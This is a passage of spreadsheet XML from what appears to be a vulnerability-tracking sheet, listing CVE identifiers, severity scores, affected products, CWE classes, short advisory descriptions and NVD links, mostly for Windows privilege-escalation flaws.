        </is>
      </c>
      <c r="H1226" s="5" t="inlineStr"/>
      <c r="I1226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L1226" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="C1227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1227" s="5" t="inlineStr"/>
      <c r="F1227" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1227" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1227" s="5" t="inlineStr"/>
      <c r="I1227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1227" s="5" t="inlineStr"/>
      <c r="K1227" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1227" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="C1228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1228" s="5" t="inlineStr"/>
      <c r="F1228" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1228" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1228" s="5" t="inlineStr"/>
      <c r="I1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1228" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="C1229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1229" s="5" t="inlineStr"/>
      <c r="F1229" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1229" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1229" s="5" t="inlineStr"/>
      <c r="I1229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1229" s="5" t="inlineStr"/>
      <c r="K1229" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1229" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="C1230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1230" s="5" t="inlineStr"/>
      <c r="F1230" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1230" s="5" t="inlineStr"/>
      <c r="I1230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1230" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="C1231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1231" s="5" t="inlineStr"/>
      <c r="F1231" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1231" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1231" s="5" t="inlineStr"/>
      <c r="I1231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1231" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="C1232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1232" s="5" t="inlineStr"/>
      <c r="F1232" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1232" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1232" s="5" t="inlineStr"/>
      <c r="I1232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1232" s="5" t="inlineStr"/>
      <c r="K1232" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1232" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="C1233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1233" s="5" t="inlineStr"/>
      <c r="F1233" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1233" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1233" s="5" t="inlineStr"/>
      <c r="I1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L1233" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="C1234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1234" s="5" t="inlineStr"/>
      <c r="F1234" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1234" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1234" s="5" t="inlineStr"/>
      <c r="I1234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1234" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="C1235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1235" s="5" t="inlineStr"/>
      <c r="F1235" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1235" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1235" s="5" t="inlineStr"/>
      <c r="I1235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1235" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="C1236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1236" s="5" t="inlineStr"/>
      <c r="F1236" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1236" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1236" s="5" t="inlineStr"/>
      <c r="I1236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1236" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="C1237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1237" s="5" t="inlineStr"/>
      <c r="F1237" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1237" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1237" s="5" t="inlineStr"/>
      <c r="I1237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1237" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="C1238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1238" s="5" t="inlineStr"/>
      <c r="F1238" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1238" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1238" s="5" t="inlineStr"/>
      <c r="I1238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1238" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="C1239" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1239" s="5" t="inlineStr"/>
      <c r="F1239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1239" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1239" s="5" t="inlineStr"/>
      <c r="I1239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1239" s="5" t="inlineStr"/>
      <c r="K1239" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1239" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="C1240" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1240" s="5" t="inlineStr"/>
      <c r="F1240" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1240" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1240" s="5" t="inlineStr"/>
      <c r="I1240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="C1241" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1241" s="5" t="inlineStr"/>
      <c r="F1241" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1241" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1241" s="5" t="inlineStr"/>
      <c r="I1241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1241" s="5" t="inlineStr"/>
      <c r="K1241" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1241" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="C1242" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1242" s="5" t="inlineStr"/>
      <c r="F1242" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1242" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1242" s="5" t="inlineStr"/>
      <c r="I1242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1242" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71553</t>
        </is>
      </c>
      <c r="C1243" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1243" s="5" t="inlineStr"/>
      <c r="F1243" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1243" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1243" s="5" t="inlineStr"/>
      <c r="I1243" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1243" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. In 4.32.0 and earlier, PATCH /api/v1/article/:id accepts the inherited path toString.call and passes it through the utility module to apos.util.set() and apos.util.get(), allowing an authenticated editor to overwrite the shared Object.prototype.toString function's call property and cause a persistent process-wide denial of service until restart.</t>
        </is>
      </c>
      <c r="M1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71553</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74881</t>
        </is>
      </c>
      <c r="C1244" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1244" s="5" t="inlineStr"/>
      <c r="F1244" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1244" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1244" s="5" t="inlineStr">
        <is>
          <t>jahlives:openssl_encrypt</t>
        </is>
      </c>
      <c r="I1244" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L1244" s="5" t="inlineStr">
        <is>
          <t>openssl_encrypt versions before 1.4.0 configure CORS with allow_origins set to wildcard and allow_credentials enabled to true. Attackers can create malicious websites that make authenticated cross-origin requests to the API on behalf of any user who visits them.</t>
        </is>
      </c>
      <c r="M1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74881</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75132</t>
        </is>
      </c>
      <c r="C1245" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1245" s="5" t="inlineStr"/>
      <c r="F1245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1245" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1245" s="5" t="inlineStr"/>
      <c r="I1245" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1245" s="5" t="inlineStr">
        <is>
          <t>WAPT Server versions 2.6.1.17834 and earlier contains a SQL injection vulnerability in the `columns` parameter of the GET `/api/v3/hosts` endpoint. A remote authenticated user with read-only privileges can inject arbitrary PostgreSQL expressions into the SQL query constructed by WAPT. By exploiting the injection point, an attacker can inject additional PostgreSQL statements, bypass the host scope restrictions applied to the account, and read information from other rows or tables within the database.</t>
        </is>
      </c>
      <c r="M1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75132</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76223</t>
        </is>
      </c>
      <c r="C1246" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1246" s="5" t="inlineStr"/>
      <c r="F1246" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1246" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1246" s="5" t="inlineStr"/>
      <c r="I1246" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1246" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB (com.arcadedb) versions 26.7.3 and earlier fail to enforce the UPDATE_SCHEMA permission check when a DEFINE FUNCTION statement targets an already-existing function library. A user with only database access can add or overwrite SQL or Cypher functions in an existing library and persist the change, enabling tampering with admin-defined function logic. The issue is fixed in 26.8.1. (JavaScript functions still trigger the UPDATE_SECURITY check and are not affected.)</t>
        </is>
      </c>
      <c r="M1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76223</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="C1247" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1247" s="5" t="inlineStr"/>
      <c r="F1247" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1247" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1247" s="5" t="inlineStr"/>
      <c r="I1247" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1247" s="5" t="inlineStr"/>
      <c r="K1247" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1247" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="M1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80380</t>
        </is>
      </c>
      <c r="C1248" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1248" s="5" t="inlineStr"/>
      <c r="F1248" s="5" t="inlineStr"/>
      <c r="G1248" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1248" s="5" t="inlineStr"/>
      <c r="I1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L1248" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote attacker to perform unauthorized actions due to cross-site request forgery.</t>
        </is>
      </c>
      <c r="M1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80380</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="C1249" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1249" s="5" t="inlineStr"/>
      <c r="F1249" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1249" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1249" s="5" t="inlineStr"/>
      <c r="I1249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1249" s="5" t="inlineStr">
        <is>
